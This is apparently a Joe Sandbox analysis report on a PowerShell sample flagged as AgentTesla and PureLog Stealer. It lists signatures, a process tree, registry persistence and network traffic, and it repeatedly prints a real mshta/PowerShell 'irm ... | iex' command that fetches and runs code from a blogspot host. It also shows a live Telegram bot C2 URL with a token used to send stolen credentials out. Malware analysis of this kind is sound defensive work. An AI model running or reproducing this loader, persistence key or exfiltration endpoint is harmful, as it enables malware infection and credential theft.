Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
o3KyzpE7F4.ps1

Overview

General Information

Sample name:o3KyzpE7F4.ps1
renamed because original name is a hash value
Original sample name:286e6941de5c1fdf6b1dfc6726c0c6f0.ps1
Analysis ID:1431777
MD5:286e6941de5c1fdf6b1dfc6726c0c6f0
SHA1:676a6423aada40788cb9cd90ae05326d5954c390
SHA256:9545ddef182171d1fd3a8e74fb6ba72614b7ca243aa70c7425157f5d0ec9963e
Tags:ps1
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected PureLog Stealer
Yara detected Telegram RAT
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Deletes itself after installation
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • powershell.exe (PID: 5012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 4956 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 6096 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 6784 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
    • RegSvcs.exe (PID: 3408 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
    • MSBuild.exe (PID: 1100 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
      • dw20.exe (PID: 4092 cmdline: dw20.exe -x -s 792 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
    • MSBuild.exe (PID: 5836 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
      • dw20.exe (PID: 1716 cmdline: dw20.exe -x -s 788 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
  • mshta.exe (PID: 5392 cmdline: C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mshta.exe (PID: 7612 cmdline: "C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • mshta.exe (PID: 7820 cmdline: C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 8120 cmdline: "C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendMessage?chat_id=6444969864"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2212429902.0000000000B9D000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000005.00000002.3250437857.000000000286A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 5 entries

              System Summary

              barindex
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5392, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, ProcessId: 7196, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5392, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;, ProcessId: 7196, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", ProcessId: 5012, ProcessName: powershell.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3],ql[0],ql[1],ql[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"., EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5012, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DRAKEXnew2
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: mshta "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3],ql[0],ql[1],ql[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"., EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5012, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DRAKEXnew2
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\o3KyzpE7F4.ps1", ProcessId: 5012, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7560, ProcessName: svchost.exe
              Timestamp:04/25/24-19:01:27.040324
              SID:2851779
              Source Port:49720
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: RegSvcs.exe.6096.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendMessage"}
              Source: RegSvcs.exe.6096.5.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendMessage?chat_id=6444969864"}
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49710 version: TLS 1.0
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
              Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.15.132:443 -> 192.168.2.5:49739 version: TLS 1.2

              Networking

              barindex
              Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49720 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: POST /bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6566aab26a81Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6578c6979a5eHost: api.telegram.orgContent-Length: 914Expect: 100-continue
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
              Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
              Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: ip-api.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.com
              Source: global trafficHTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.com
              Source: global trafficHTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49710 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.com
              Source: global trafficHTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.com
              Source: global trafficHTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /haha HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: minecap4-22-24.blogspot.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: global trafficDNS traffic detected: DNS query: minecap4-22-24.blogspot.com
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6566aab26a81Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive
              Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchrss/1.0/
              Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.0000000002A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: powershell.exe, 0000000F.00000002.2322477147.000002D2AB25C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blogspot.l.googleusercontent.com
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: powershell.exe, 00000017.00000002.2629762784.0000028E45324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000017.00000002.2534722701.0000028E2B315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: powershell.exe, 00000017.00000002.2530488190.0000028E2B0F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
              Source: svchost.exe, 00000012.00000002.3247677107.00000235C680D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: powershell.exe, 00000000.00000002.2445820760.0000024418187000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2445039609.0000024417DD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: qmgr.db.18.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
              Source: RegSvcs.exe, 00000005.00000002.3250437857.0000000002816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
